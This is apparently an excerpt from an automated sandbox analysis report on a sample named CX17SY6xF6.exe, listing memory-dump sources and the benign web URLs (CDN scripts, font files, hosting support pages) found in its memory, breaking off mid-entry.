                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js?ver=1.0.0
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stats.wp.com/w.js?ver=202330
                  Source: CX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/all.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot?#iefix
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.svg#fontawesome
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.ttf
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 